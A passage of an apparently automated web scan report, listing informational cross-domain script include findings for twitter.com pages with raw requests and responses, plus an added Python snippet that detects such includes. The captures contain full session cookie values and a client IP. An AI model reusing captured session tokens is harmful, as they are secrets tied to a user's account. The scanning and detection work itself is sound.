X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.341. http://twitter.com/Michael_Joseph

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224739-65021-17900
ETag: "4ee6993dd58f48089b6cdab2133559a8"
Last-Modified: Fri, 28 Jan 2011 14:25:39 GMT
X-Runtime: 0.01172
Content-Type: text/html; charset=utf-8
Content-Length: 51377
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.342. http://twitter.com/Michael_Joseph/status/30390775099424770

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30390775099424770

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph/status/30390775099424770 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225123-34122-51661
ETag: "ad47dca48519abfdbb5a652dea242307"
Last-Modified: Fri, 28 Jan 2011 14:32:03 GMT
X-Runtime: 0.09137
Content-Type: text/html; charset=utf-8
Content-Length: 13965
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwMzkwNzc1MDk5NDI0NzcwOgxjc3JmX2lkIiUxOTI0%250AM2Y5OTA4Y2E0Y2Q5NDkwMTllYmQ1MjJlMmI2YjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--3e792d27f106fc164e2c66dc7fc4921ffee553f5; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.343. http://twitter.com/Michael_Joseph/status/30390775099424770

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30390775099424770

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph/status/30390775099424770 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224917-75373-44870
ETag: "7b489ae25bea2d0595afca259835fae7"
Last-Modified: Fri, 28 Jan 2011 14:28:37 GMT
X-Runtime: 0.04662
Content-Type: text/html; charset=utf-8
Content-Length: 13965
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwMzkwNzc1MDk5NDI0NzcwOgxjc3JmX2lkIiViNWFh%250AMzYyYjVlN2NkY2M5MjE1YzdhZjdkNjRhMzgwMjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--f1b68fb54f1b85d8151c7dd784fd1db4f27f519c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
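The "cross-domain script include" entries in this section all rest on one check: collect every <script src=...> in the response and flag those whose host is not the page's own host. The following script is an added example that reproduces that check; it is not part of the crawler report, nor Burp's or Twitter's code. The sample HTML inside it is constructed to mirror the script tags visible in the twitter.com responses above (ajax.googleapis.com, a*.twimg.com, www.google.com) with a same-origin and a relative include added for contrast. Note that an exact host comparison, which is what the scanner applies, flags Twitter's own CDN (twimg.com) alongside genuine third parties such as googleapis.com; deciding which of those hosts are actually trusted is the manual step that follows an Information-severity finding like this.

```python
"""Added example: reproduce the scanner's cross-domain script include check.

Parses an HTML response body, collects every <script src=...>, and reports
those served from a host other than the page's own. The sample HTML below is
a constructed fragment, not a capture from the report.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, ignoring inline scripts."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def cross_domain_scripts(page_url, html):
    """Return the script URLs whose host differs from the page's host.

    Relative ('/js/a.js') and scheme-relative ('//cdn.example/x.js') values
    are resolved against page_url first so they are classified correctly.
    The comparison is an exact, case-insensitive host match, so a0.twimg.com
    counts as foreign to twitter.com, just as the scanner treats it.
    """
    page_host = urlsplit(page_url).hostname.lower()
    parser = ScriptSrcCollector()
    parser.feed(html)
    foreign = []
    for src in parser.srcs:
        host = urlsplit(urljoin(page_url, src)).hostname
        if host is not None and host.lower() != page_host:
            foreign.append(src)
    return foreign


def foreign_hosts(page_url, html):
    """Deduplicated, sorted list of third-party hosts the page loads script from."""
    return sorted({urlsplit(urljoin(page_url, s)).hostname.lower()
                   for s in cross_domain_scripts(page_url, html)})


# Constructed sample: modelled on the twitter.com responses in this report,
# plus one scheme-relative, one relative and one same-origin include.
SAMPLE_PAGE_URL = "http://twitter.com/MittRomney"
SAMPLE_HTML = """
<html><head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="//a0.twimg.com/a/1296179758/javascripts/lib/mustache.js" type="text/javascript"></script>
<script src="/javascripts/local.js"></script>
<script src="http://twitter.com/javascripts/same_origin.js"></script>
<script type="text/javascript">var inline = 1;</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for src in cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("cross-domain script:", src)
    print("third-party hosts:", foreign_hosts(SAMPLE_PAGE_URL, SAMPLE_HTML))
```

Run against a saved response body and the page URL from the Request block to get the list the report's "Issue detail" line refers to; the relative and same-origin includes in the sample are deliberately left out of the result.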

18.344. http://twitter.com/Michael_Joseph/status/30750905452204032

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30750905452204032

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph/status/30750905452204032 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234515-75932-52610
ETag: "7326481ded1d383b595ee0ec222d28b4"
Last-Modified: Fri, 28 Jan 2011 17:08:35 GMT
X-Runtime: 0.04043
Content-Type: text/html; charset=utf-8
Content-Length: 13831
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOhVpbl9uZXdfdXNlcl9m%250AbG93MDoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6DHR6X25hbWUiFENlbnRyYWwgQW1lcmljYToHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--cde2e2cb11fa89a19f184bd95f9626dd2ca9bfdc; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.345. http://twitter.com/Michael_Joseph/status/30750905452204032

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30750905452204032

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph/status/30750905452204032 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225123-79092-4222
ETag: "638a1028f1835fd35340e2e3ae3ae646"
Last-Modified: Fri, 28 Jan 2011 14:32:03 GMT
X-Runtime: 0.37951
Content-Type: text/html; charset=utf-8
Content-Length: 13961
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOgxjc3JmX2lkIiVkODZk%250AMjcyMjlhNTEzMTJlNGRlNDE2YTAwZDEyZWE0NzoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsA--7730b0835aca73fbfa7584451a530b004e00e740; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.346. http://twitter.com/Michael_Joseph/status/30750905452204032

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30750905452204032

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph/status/30750905452204032 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224914-94525-23113
ETag: "83bfba4b5292333b01c60b5cd56ed6f4"
Last-Modified: Fri, 28 Jan 2011 14:28:34 GMT
X-Runtime: 0.04125
Content-Type: text/html; charset=utf-8
Content-Length: 13962
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOgxjc3JmX2lkIiU2NGIz%250AM2Q5ODM3OTJkMzdhM2NmN2MyMTM0MTQwMWI1YjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--541977a9c3c5e1a5a3320c2e55e9133173473f96; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.347. http://twitter.com/Michael_Joseph/status/30790097846673409

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph/status/30790097846673409

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph/status/30790097846673409 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225122-5733-7148
ETag: "d9d2e6dcd4d80c4ffb43dbbb3bd38df8"
Last-Modified: Fri, 28 Jan 2011 14:32:02 GMT
X-Runtime: 0.06399
Content-Type: text/html; charset=utf-8
Content-Length: 14048
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzkwMDk3ODQ2NjczNDA5Ogxjc3JmX2lkIiUxNmQw%250AYTUyZDkwZTIxNjg3ZDFjNzAxMmIyMTMzZjAyYzoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--1717b69e386408623023239f5727e6426422dbd2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


